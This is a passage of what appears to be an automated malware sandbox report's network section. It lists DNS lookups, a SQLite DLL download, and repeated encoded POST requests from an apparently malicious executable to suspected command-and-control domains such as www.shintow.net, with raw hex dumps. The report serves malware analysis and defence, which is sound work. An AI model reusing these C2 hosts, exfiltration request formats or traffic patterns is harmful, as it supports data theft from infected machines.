                                                                                  Nov 15, 2024 06:47:08.537463903 CET4918580192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:09.437210083 CET4918580192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:09.442285061 CET804918513.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:10.453435898 CET4918680192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:10.458487034 CET804918613.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:10.461097002 CET4918680192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:10.464615107 CET4918680192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:10.469702959 CET804918613.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:11.089286089 CET804918613.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:11.090033054 CET804918613.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:11.090553045 CET4918680192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:11.093274117 CET4918680192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:11.098181963 CET804918613.248.213.45192.168.2.22

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 15, 2024 06:45:33.731853008 CET5456253192.168.2.228.8.8.8
                                                                                  Nov 15, 2024 06:45:33.744108915 CET53545628.8.8.8192.168.2.22
                                                                                  Nov 15, 2024 06:45:39.387567043 CET5291753192.168.2.228.8.8.8
                                                                                  Nov 15, 2024 06:45:39.399827003 CET53529178.8.8.8192.168.2.22
                                                                                  Nov 15, 2024 06:45:49.479406118 CET6275153192.168.2.228.8.8.8
                                                                                  Nov 15, 2024 06:45:49.495291948 CET53627518.8.8.8192.168.2.22
                                                                                  Nov 15, 2024 06:46:03.203102112 CET5789353192.168.2.228.8.8.8
                                                                                  Nov 15, 2024 06:46:03.352504969 CET53578938.8.8.8192.168.2.22
                                                                                  Nov 15, 2024 06:46:16.919773102 CET5482153192.168.2.228.8.8.8
                                                                                  Nov 15, 2024 06:46:16.936292887 CET53548218.8.8.8192.168.2.22
                                                                                  Nov 15, 2024 06:46:30.206625938 CET5471953192.168.2.228.8.8.8
                                                                                  Nov 15, 2024 06:46:30.320662022 CET53547198.8.8.8192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.102744102 CET4988153192.168.2.228.8.8.8
                                                                                  Nov 15, 2024 06:46:49.230464935 CET53498818.8.8.8192.168.2.22
                                                                                  Nov 15, 2024 06:47:02.612559080 CET5499853192.168.2.228.8.8.8
                                                                                  Nov 15, 2024 06:47:02.628511906 CET53549988.8.8.8192.168.2.22

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Nov 15, 2024 06:45:33.731853008 CET192.168.2.228.8.8.80x2489Standard query (0)www.ila.beautyA (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:45:39.387567043 CET192.168.2.228.8.8.80x7088Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:45:49.479406118 CET192.168.2.228.8.8.80xf2a0Standard query (0)www.shintow.netA (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:46:03.203102112 CET192.168.2.228.8.8.80x4f96Standard query (0)www.mireela.proA (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:46:16.919773102 CET192.168.2.228.8.8.80x9198Standard query (0)www.micrhyms.infoA (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:46:30.206625938 CET192.168.2.228.8.8.80x78c4Standard query (0)www.estrela-b.onlineA (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:46:49.102744102 CET192.168.2.228.8.8.80x9106Standard query (0)www.meanttobebroken.orgA (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:47:02.612559080 CET192.168.2.228.8.8.80x73c4Standard query (0)www.mjmegartravel.onlineA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Nov 15, 2024 06:45:33.744108915 CET8.8.8.8192.168.2.220x2489No error (0)www.ila.beauty76.223.54.146A (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:45:33.744108915 CET8.8.8.8192.168.2.220x2489No error (0)www.ila.beauty13.248.169.48A (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:45:39.399827003 CET8.8.8.8192.168.2.220x7088No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:45:49.495291948 CET8.8.8.8192.168.2.220xf2a0No error (0)www.shintow.netghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 15, 2024 06:45:49.495291948 CET8.8.8.8192.168.2.220xf2a0No error (0)ghs.googlehosted.com172.217.18.115A (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:46:03.352504969 CET8.8.8.8192.168.2.220x4f96No error (0)www.mireela.pro69.57.163.227A (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:46:16.936292887 CET8.8.8.8192.168.2.220x9198No error (0)www.micrhyms.infomicrhyms.infoCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 15, 2024 06:46:16.936292887 CET8.8.8.8192.168.2.220x9198No error (0)micrhyms.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:46:16.936292887 CET8.8.8.8192.168.2.220x9198No error (0)micrhyms.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:46:30.320662022 CET8.8.8.8192.168.2.220x78c4No error (0)www.estrela-b.onlineestrela-b.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 15, 2024 06:46:30.320662022 CET8.8.8.8192.168.2.220x78c4No error (0)estrela-b.online162.241.63.77A (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:46:49.230464935 CET8.8.8.8192.168.2.220x9106No error (0)www.meanttobebroken.org141.193.213.11A (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:46:49.230464935 CET8.8.8.8192.168.2.220x9106No error (0)www.meanttobebroken.org141.193.213.10A (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:47:02.628511906 CET8.8.8.8192.168.2.220x73c4No error (0)www.mjmegartravel.onlinemjmegartravel.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 15, 2024 06:47:02.628511906 CET8.8.8.8192.168.2.220x73c4No error (0)mjmegartravel.online13.248.213.45A (IP address)IN (0x0001)false
                                                                                  Nov 15, 2024 06:47:02.628511906 CET8.8.8.8192.168.2.220x73c4No error (0)mjmegartravel.online76.223.67.189A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.ila.beauty
                                                                                  • www.sqlite.org
                                                                                  • www.shintow.net
                                                                                  • www.mireela.pro
                                                                                  • www.micrhyms.info
                                                                                  • www.estrela-b.online
                                                                                  • www.meanttobebroken.org
                                                                                  • www.mjmegartravel.online

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.224916176.223.54.14680172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:45:33.784399033 CET413OUTGET /qq33/?WrGp=yRUDttthc40H6jfP&5RH=i6Dk+UJVjxglEXs3yyUE1WXG/wtHu1mV9FpOihhS4ziFAzHmIjfzSWYGuuWTb7Mve8esrSqeFR09QtNoutRLtyBsWM1L4jpBKikP70GTc17iz2FS/96s1feDLjv+ HTTP/1.1
                                                                                  Host: www.ila.beauty
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Nov 15, 2024 06:45:34.427803040 CET405INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Fri, 15 Nov 2024 05:45:34 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 265
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 72 47 70 3d 79 52 55 44 74 74 74 68 63 34 30 48 36 6a 66 50 26 35 52 48 3d 69 36 44 6b 2b 55 4a 56 6a 78 67 6c 45 58 73 33 79 79 55 45 31 57 58 47 2f 77 74 48 75 31 6d 56 39 46 70 4f 69 68 68 53 34 7a 69 46 41 7a 48 6d 49 6a 66 7a 53 57 59 47 75 75 57 54 62 37 4d 76 65 38 65 73 72 53 71 65 46 52 30 39 51 74 4e 6f 75 74 52 4c 74 79 42 73 57 4d 31 4c 34 6a 70 42 4b 69 6b 50 37 30 47 54 63 31 37 69 7a 32 46 53 2f 39 36 73 31 66 65 44 4c 6a 76 2b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?WrGp=yRUDttthc40H6jfP&5RH=i6Dk+UJVjxglEXs3yyUE1WXG/wtHu1mV9FpOihhS4ziFAzHmIjfzSWYGuuWTb7Mve8esrSqeFR09QtNoutRLtyBsWM1L4jpBKikP70GTc17iz2FS/96s1feDLjv+"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.224916245.33.6.223803412C:\Windows\SysWOW64\xcopy.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:45:39.422689915 CET278OUTGET /2019/sqlite-dll-win32-x86-3290000.zip HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Host: www.sqlite.org
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  Nov 15, 2024 06:45:40.055100918 CET249INHTTP/1.1 200 OK
                                                                                  Connection: keep-alive
                                                                                  Date: Fri, 15 Nov 2024 05:45:39 GMT
                                                                                  Last-Modified: Thu, 03 Oct 2019 16:46:08 GMT
                                                                                  Cache-Control: max-age=120
                                                                                  ETag: "m5d9625d0s76a84"
                                                                                  Content-type: application/zip; charset=utf-8
                                                                                  Content-length: 486020
                                                                                  Nov 15, 2024 06:45:40.055126905 CET1236INData Raw: 50 4b 03 04 14 00 00 00 08 00 2d 09 eb 4e 4f a9 ef 3a 34 05 00 00 cf 15 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 d5 29 26 5d d5 29 26 5d 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 cd 92 dc 28 0c 80 ef 79 9b 64 b6
                                                                                  Data Ascii: PK-NO:4sqlite3.defUT)&])&]ux(ydrTv{sa,3==Ot4'BHB?2ms&GJ!<;`g!1(i)ClW.fk>Q24k;g)o<N56i8gBqA
                                                                                  Nov 15, 2024 06:45:40.055147886 CET212INData Raw: 71 dc 01 5d 90 b7 6e a7 a8 cd cf 27 6d d3 f3 49 59 76 ae a8 3b 7c 97 9b 29 ee ac c2 37 5a 7d 8a a6 85 01 07 9b f2 4c 49 84 d1 f4 b8 2d ba de bb 24 97 fa 8b 41 0b 58 30 eb 84 32 eb 0d 9a a8 35 f9 63 ad 64 b5 c7 55 9c bf ba e4 5a 38 5b 95 89 fe 17
                                                                                  Data Ascii: q]n'mIYv;|)7Z}LI-$AX025cdUZ8[SO|t8aS4=02f #;GdS'jfP?]Zo4+}PK-Nd{"sqlite3.dllUT
                                                                                  Nov 15, 2024 06:45:40.055161953 CET1236INData Raw: 29 26 5d d5 29 26 5d 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 ec fd 7f 7c 54 d5 b5 38 0c cf 99 39 49 26 61 e0 0c 30 c0 04 23 44 8d 4a 04 35 a3 68 33 26 ea 24 93 09 11 88 06 c2 20 82 51 d3 6a ae 5e b4 45 38 87 04 c8 90 a1 27 69 b3 b3 3d ad ad
                                                                                  Data Ascii: )&])&]ux|T89I&a0#DJ5h3&$ Qj^E8'i=V+6 *$PBD<Im 4>g_9gkZ+_6YL&"iIc/&1Q_o-}n]?/~gRJO}yc4F
                                                                                  Nov 15, 2024 06:45:40.055243015 CET1236INData Raw: 8d 75 8a 33 f2 ed 1e 83 24 d4 ac 44 9c b8 06 d0 9b 7a 86 6b 93 37 7e 7b f2 3a bd da 70 d7 c8 18 24 b3 f1 ed 51 a3 c8 5f c2 9f c0 57 a5 1e cb 44 d7 4f 4f 4a 4b 5c fb 97 3a b2 e0 32 86 05 25 ce a4 8b d3 e6 d0 bc b4 54 b5 70 84 8d 19 20 8d 31 5e 80
                                                                                  Data Ascii: u3$Dzk7~{:p$Q_WDOOJK\:2%Tp 1^6_nL6~P`FC=)X;@Mq6fVG=.%k:D%#GT]|C4lqqB)Inf9jD(iv42Zq`K(r*A`JN*YiF|.#i[=
                                                                                  Nov 15, 2024 06:45:40.055260897 CET1236INData Raw: f5 b5 73 9d 42 bd dd 18 06 d1 66 f1 f5 b8 7d dd e5 3d ae 0e c0 7d cc bd 5a ea 99 4a da b3 a4 f6 aa f5 0c 11 2b ef 87 6e f5 d7 f4 4b a9 f2 e0 e4 aa eb a8 d4 29 ec ac f5 c0 ce e8 61 9d 82 b7 7b d3 0f ac ee 4f d2 4e 42 9e 09 ab 7d 3d 53 84 9d f3 2d
                                                                                  Data Ascii: sBf}=}ZJ+nK)a{ONB}=S-W5.5W'|JVq$faS*v{RxeVC\u[S>Wxsb^,h<7))(T>0ddo<_gmz3/731$)aS
                                                                                  Nov 15, 2024 06:45:40.055277109 CET636INData Raw: 8e cf 4b 42 9f fb 42 9d f7 3c bf ef 42 e9 e7 33 db 9a 16 66 d9 d7 fd 8b c1 23 34 d1 45 c8 62 4e 21 ed ae 8e 81 8b f4 71 d9 56 73 42 d2 60 d6 1f de 92 f5 86 60 32 95 4f 87 19 3c d4 a8 5a e4 33 09 42 7d 9e c5 76 78 50 0e 71 5a 06 69 57 d6 72 1f 07
                                                                                  Data Ascii: KBB<B3f#4EbN!qVsB``2O<Z3B}vxPqZiWrPp+(/Os76%x@j?MzMy)alun4B^IEK~x}"UK9A%9sYNnCRyr&7I+"N"[pcIAq&`cS
                                                                                  Nov 15, 2024 06:45:40.055294037 CET1236INData Raw: b7 94 c2 10 70 5c f4 2e 5a c1 53 27 91 4e d2 b5 bc 7b a0 ea f6 4a 7b 56 c9 c9 f2 5b e0 d1 56 19 07 8f eb e2 00 19 49 23 d0 33 58 1f 49 e4 30 d9 cb ba d3 42 96 58 b5 89 f0 87 ae b4 e2 9a 24 b9 56 d8 48 a3 dc 03 13 55 00 03 0f a0 2c ef c1 75 67 57
                                                                                  Data Ascii: p\.ZS'N{J{V[VI#3XI0BX$VHU,ugW/_DpdhLE6J.{$2/*k#lB(Y&"A+D,SmAm,j+&y5m"ki\B6L.Oc^+LX"r4i
                                                                                  Nov 15, 2024 06:45:40.055310011 CET1236INData Raw: a0 61 c2 b6 47 27 79 c8 8b 36 d8 b3 dc 47 cb 6f 9e eb eb de 81 c2 bc c5 d7 53 26 0f f2 42 ee ee 32 92 33 05 64 3b f8 b1 e3 6e 8e 43 07 1d a5 be 90 f1 16 fe 2e 30 0e 63 44 99 e9 ce 60 60 84 fa 15 20 37 82 20 25 d4 df 2d 8f 54 ad bf 49 d9 64 95 cf
                                                                                  Data Ascii: aG'y6GoS&B23d;nC.0cD`` 7 %-TIdWy,(Kj-G>T%u$Hyj<\_|ZYFPxw|mBI u8+8?U%_V&e'Nr" 0SV>[>en*ZZ}tI;
                                                                                  Nov 15, 2024 06:45:40.055391073 CET424INData Raw: c0 9a 59 62 5d f9 98 8e 8f 1e 3e 57 3e 6b 61 87 81 d3 eb 6a 91 55 93 cf 5c 4d 3c 54 cb 1e 01 73 b4 f3 78 36 a7 4b c2 fa f1 99 0d b5 9f f8 d5 22 bc d6 30 76 b0 56 26 6f b4 02 75 86 fd 78 42 cc 2a 87 2d e3 41 c4 87 65 17 4a 63 12 cb 6e e6 3c 65 f7
                                                                                  Data Ascii: Yb]>W>kajU\M<Tsx6K"0vV&ouxB*-AeJcn<esUjNlK-3f%oFm6DA.%;]kwg|1{UOv#a_q,qxa;; m%4jF-q5nkG=q9mul*T?
                                                                                  Nov 15, 2024 06:45:40.060332060 CET1236INData Raw: 2d 29 11 d1 63 a9 d3 54 74 8b 71 3a 8d 5d 38 40 5a 5c 27 50 86 28 b4 d6 f1 b3 ab 1b c4 84 ec 3b 44 8b 57 bb 04 02 c7 2d 20 89 5a a3 4d f6 f7 e0 2e 7d f3 39 26 ef 7c 17 76 6a ea ef 09 66 27 9b a4 15 4a e5 6c ce 75 e2 9a d2 fd 62 2a 2b 2d 1a a5 7b
                                                                                  Data Ascii: -)cTtq:]8@Z\'P(;DW- ZM.}9&|vjf'Jlub*+-{gY[L+t(g4OJZ:>:J&;om9v"+>[$dVzW/\&dh,^a~.igy&v<-vJL^$4YaM3m4rI


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.2249163172.217.18.11580172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:45:49.511475086 CET2472OUTPOST /ow7i/ HTTP/1.1
                                                                                  Host: www.shintow.net
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.shintow.net
                                                                                  Referer: http://www.shintow.net/ow7i/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 2160
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 66 76 30 6d 46 61 59 65 48 52 4e 48 48 38 2f 68 33 6d 62 35 67 71 73 70 46 39 6f 32 62 75 64 4f 59 55 2f 6c 47 61 4c 44 63 6b 74 61 31 76 47 64 4f 52 5a 67 42 4b 49 70 67 39 6c 75 6e 6c 52 42 78 61 66 42 55 62 30 49 75 75 44 79 50 6d 48 6b 61 69 34 70 61 68 42 66 47 47 4d 31 55 66 6b 41 6f 78 62 50 59 4b 6f 56 4c 48 32 73 68 72 64 67 4c 68 75 7a 4c 4a 64 5a 52 67 42 5a 4e 2f 4e 64 6d 4d 2f 36 67 6c 50 37 77 71 39 58 34 72 62 2b 53 4d 5a 45 4e 46 4d 51 53 74 78 6b 4c 55 72 64 2b 73 38 44 45 38 74 5a 61 57 36 72 39 58 47 47 57 6f 34 65 71 6a 67 58 4c 76 4e 62 74 77 56 7a 4c 30 35 34 50 69 32 4d 31 2b 33 65 36 4c 2b 44 67 33 75 54 38 77 50 69 6a 62 44 36 4c 69 2b 65 37 53 54 39 4e 32 36 68 66 58 2b 57 32 50 6a 56 37 65 48 42 4c 2b 47 44 44 74 70 76 43 50 35 77 65 30 72 4d 46 4e 6e 59 30 34 62 49 39 72 50 54 4a 47 58 68 33 2f 69 56 4a 47 5a 79 67 38 63 2f 44 48 46 55 73 69 30 4e 48 2b 66 64 77 4a 55 73 31 4d 63 31 4b 48 78 61 75 6e 48 42 6d 55 6b 79 41 [TRUNCATED]
                                                                                  Data Ascii: 5RH=O4lQUcptNkK6ufv0mFaYeHRNHH8/h3mb5gqspF9o2budOYU/lGaLDckta1vGdORZgBKIpg9lunlRBxafBUb0IuuDyPmHkai4pahBfGGM1UfkAoxbPYKoVLH2shrdgLhuzLJdZRgBZN/NdmM/6glP7wq9X4rb+SMZENFMQStxkLUrd+s8DE8tZaW6r9XGGWo4eqjgXLvNbtwVzL054Pi2M1+3e6L+Dg3uT8wPijbD6Li+e7ST9N26hfX+W2PjV7eHBL+GDDtpvCP5we0rMFNnY04bI9rPTJGXh3/iVJGZyg8c/DHFUsi0NH+fdwJUs1Mc1KHxaunHBmUkyAAoJaixa/3junJjBFkT+6Z9Uob04lMiQfuoAbycd7YczW306IklzDrN0TVVBs29shzFKDLjuIJjsnkTqpCDh/NUPbtwDbwRF+uEU+DTInWTxZYq9Y+9M4VOENLFKhiIJmTTzawvCfGJ7QNUfoPHyA0l+lJCyNjyTxgV7v3ZAGz1m/f4+28UU9s+nLKoCRHQb8u/gp55W+1m6FPIPPB9LRSjKvHRhDKopnHk4cfEJsXTiQTo2PzXi6hpJdPREfc5zJQRoIiCUslDHzLFn5dU9AtMpfvkusvl6Mgqk2dibUZnLrC3lcF/+fRoLgaiieIlZKew/48KMRVQUiGcQdQCGE+c5PuE8qiXp/Bsha9j+Uu38kU6SdFM98bODoMNIa0OFf0Ni5y5OivF9mAVge4LyC+N/6VQm9zckR3LwYW9SJkNd2ZZAQl5TyCCqgCDItYsi4b39bLAeTMI02MZo+gkEjcBXEjLp7BpA+6vCYgusFwsLtwBRhAxsq2X0A3GmZYFE21Y6mM90phDbaL/GGJooO3WGp8WXhtTzsw0kSyzVOaSe2lpItZP/VM3q4VV5ao6Y9wKG0VxcXdgwVMRQmQg9lsBITapSpQhY0Otvi/tabU5syUKfYRn+2F5VYjbwEVjh1wgLXIw4nxxwrUQhFKVGrwGhVrz2TYmt0xp [TRUNCATED]
                                                                                  Nov 15, 2024 06:45:49.516602993 CET155OUTData Raw: 45 48 57 73 6b 55 62 6b 79 45 73 59 43 58 35 65 36 65 54 54 6a 41 56 69 48 6f 50 38 5a 45 41 76 56 38 2f 63 79 34 7a 32 51 6f 65 44 63 35 44 42 31 53 32 4a 6a 47 4c 70 34 38 4e 72 70 6d 6b 37 31 44 63 35 4c 5a 4d 5a 4b 67 44 67 31 32 39 2f 4e 46
                                                                                  Data Ascii: EHWskUbkyEsYCX5e6eTTjAViHoP8ZEAvV8/cy4z2QoeDc5DB1S2JjGLp48Nrpmk71Dc5LZMZKgDg129/NFR7WWqG4huwJvieWxLj9YzCkdK4QU985x2kRC4Mu3l9teMPDl7KTcQMqanOXg+KSdxyLntCoss
                                                                                  Nov 15, 2024 06:45:50.439023972 CET401INHTTP/1.1 301 Moved Permanently
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Fri, 15 Nov 2024 05:45:50 GMT
                                                                                  Location: https://www.shintow.net/ow7i/
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.2249164172.217.18.11580172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:45:52.046972036 CET666OUTPOST /ow7i/ HTTP/1.1
                                                                                  Host: www.shintow.net
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.shintow.net
                                                                                  Referer: http://www.shintow.net/ow7i/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 63 33 30 6e 55 61 59 65 6e 52 4e 4b 6e 38 2f 72 58 6d 64 35 67 6d 65 70 45 4a 34 33 71 6d 64 4f 4b 63 2f 6d 30 43 4c 41 63 6b 69 53 56 75 50 41 2b 52 32 67 42 4b 2b 70 6c 64 6c 75 6e 78 52 43 58 57 66 48 52 6e 31 51 4f 75 46 37 76 6d 47 6b 61 75 4c 70 61 74 52 66 48 75 4d 31 58 62 6b 53 34 68 62 4b 36 69 6f 44 4c 48 73 39 78 71 64 67 4c 64 42 7a 4c 5a 46 5a 51 63 42 5a 63 54 4e 65 31 49 2f 70 6a 39 50 67 41 71 38 53 34 71 72 36 6a 68 46 47 2f 46 33 57 45 74 2f 75 4a 4d 45 55 4f 73 46 62 57 35 6b 58 49 75 6b 6c 5a 75 36 4d 48 46 31 44 67 3d 3d
                                                                                  Data Ascii: 5RH=O4lQUcptNkK6uc30nUaYenRNKn8/rXmd5gmepEJ43qmdOKc/m0CLAckiSVuPA+R2gBK+pldlunxRCXWfHRn1QOuF7vmGkauLpatRfHuM1XbkS4hbK6ioDLHs9xqdgLdBzLZFZQcBZcTNe1I/pj9PgAq8S4qr6jhFG/F3WEt/uJMEUOsFbW5kXIuklZu6MHF1Dg==
                                                                                  Nov 15, 2024 06:45:53.006546021 CET401INHTTP/1.1 301 Moved Permanently
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Fri, 15 Nov 2024 05:45:52 GMT
                                                                                  Location: https://www.shintow.net/ow7i/
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.2249165172.217.18.11580172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:45:54.589394093 CET2472OUTPOST /ow7i/ HTTP/1.1
                                                                                  Host: www.shintow.net
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.shintow.net
                                                                                  Referer: http://www.shintow.net/ow7i/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 3624
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 34 4c 30 6c 33 69 59 66 48 52 4d 46 48 38 2f 68 33 6d 5a 35 67 71 65 70 46 39 6f 32 5a 4b 64 4f 64 41 2f 6c 57 61 4c 4d 38 6b 69 47 6c 76 47 64 4f 52 61 67 41 72 4e 70 67 35 54 75 6b 64 52 42 77 61 66 42 58 7a 30 4a 75 75 44 74 66 6d 46 6b 61 75 6b 70 61 39 56 66 48 36 69 31 57 7a 6b 53 4b 35 62 50 4b 69 72 50 72 48 73 39 78 71 5a 67 4c 64 39 7a 4c 42 72 5a 55 52 5a 5a 4f 4c 4e 64 57 4d 2f 72 41 6c 51 33 51 71 34 63 59 72 76 2b 53 41 4f 45 4e 46 49 51 53 51 61 6b 4c 59 72 64 73 30 38 44 46 38 73 41 61 57 35 6d 64 58 47 5a 47 6f 36 65 71 6a 73 58 4c 76 4e 62 74 6b 56 78 62 30 35 34 4b 43 78 52 6c 2b 33 41 4b 4c 4a 63 77 36 58 54 34 51 31 69 69 71 68 37 34 4f 2b 66 34 36 54 32 64 32 36 6e 76 58 43 57 32 50 2b 62 62 66 73 42 4c 33 35 44 41 45 6b 76 43 50 35 77 62 67 72 4a 57 6c 6e 66 6b 34 62 45 64 72 4b 61 70 47 55 68 33 4c 36 56 4a 69 5a 79 6c 6f 63 2f 78 50 46 53 70 32 33 55 6e 2b 53 5a 77 4a 57 6e 56 4d 7a 31 4b 61 6b 61 75 75 53 42 6d 45 6b 79 46 [TRUNCATED]
